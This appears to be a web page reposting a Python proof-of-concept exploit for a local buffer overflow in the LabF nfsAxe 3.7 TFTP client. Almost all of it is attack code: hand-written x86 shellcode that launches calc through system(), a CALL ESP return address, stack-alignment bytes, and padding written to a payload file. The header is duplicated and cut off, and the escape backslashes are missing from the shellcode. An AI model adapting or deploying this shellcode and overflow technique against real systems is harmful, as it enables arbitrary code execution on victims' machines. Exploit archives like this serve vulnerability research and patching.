Get Rid of Ads!

Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

LabF nfsAxe 3.7 TFTP Client Local Buffer Overflow Client

Details
Category: Vulnerabilities
Hits: 454
#!/usr/bin/python
########################################################################################################
# Exploit Author: Miguel Mendez Z
# Exploit Title: LabF nfsAxe #!/usr/bin/python
########################################################################################################
# Exploit Author: Miguel Mendez Z
# Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow
# Date: 29-01-2018
# Software: LabF nfsAxe
# Version: v3.7
# Vendor Homepage: http://www.labf.com
# Software Link: http://www.labf.com/download/nfsaxe.exe
# Tested on: Windows 7 x86
########################################################################################################

import struct

ropAlignEsp = (
"x83xECx58" #SUB ESP,58
"x83xECx58" #SUB ESP,58
"x83xECx58" #SUB ESP,58
"x83xECx58" #SUB ESP,58
"x83xECx10" #SUB ESP,10
"xFFxE4" #JMP ESP
)

scode = "xB9xEFxEExEExEE" #MOV ECX,EEEEEEEF
scode += "x81xC1x11x11x11x11" #ADD ECX,11111111
scode += "x51" #PUSH ECX
scode += "x68x31x30x73x21" #PUSH 31307321
scode += "x68x73x31x6bx72" #PUSH 73316b72
scode += "x68x5fx62x79x5f" #PUSH 5f62795f
scode += "x68x70x77x6ex64" #PUSH 70776e64
scode += "x68x42x30x66x5f" #PUSH 4230665f
scode += "x8BxD4" #MOV EDX,ESP
scode += "x48" #DEC EAX
scode += "x50" #PUSH EAX
scode += "x52" #PUSH EDX
scode += "x52" #PUSH EDX
scode += "x50" #PUSH EAX
scode += "xBAx11xEAx1Ax76" #MOV EDX,USER32.MessageBoxA() (Change)
scode += "xFFxD2" #CALL EDX
#--------------
scode += "x33xD2" #XOR EDX,EDX
scode += "xB9xEFxEExEExEE" #MOV ECX,EEEEEEEF
scode += "x81xC1x11x11x11x11" #ADD ECX,11111111
scode += "x51" #PUSH ECX
scode += "x68x63x61x6cx63" #PUSH 0x63616c63
scode += "x8BxD4" #MOV EDX,ESP
scode += "x52" #PUSH EDX
scode += "x33xD2" #XOR EDX,EDX
scode += "xBAx6FxB1x0Fx76" #MOV EDX,msvcrt.system - 0x760fb16f (Change)
scode += "xFFxD2" #CALL EDX
#--------------
scode += "x50" #PUSH EAX
scode += "xB8xE2xBBxB5x75" #MOV EAX,kernel32.ExitProcess() (Change)
scode += "xFFxD0" #CALL EAX

offset = "Host: "+scode+"A"*(1000-len(scode))+" "
offset += "File(s): "+"B"*33
offset += struct.pack("<L",0x75A6923D) #CALL ESP ADVAPI32.DLL
offset += "B"*5
offset += ropAlignEsp
offset += "B"*(1037-37+(len(ropAlignEsp)-5))+" "
offset += "Remote Dir y Local Dir: "+"C"*1000

payload = offset
print "Payload len: "+str(len(payload))
print "Shellcode len: "+str(len(scode))

file=open('tftpPoc.txt','w')
file.write(payload)
file.close()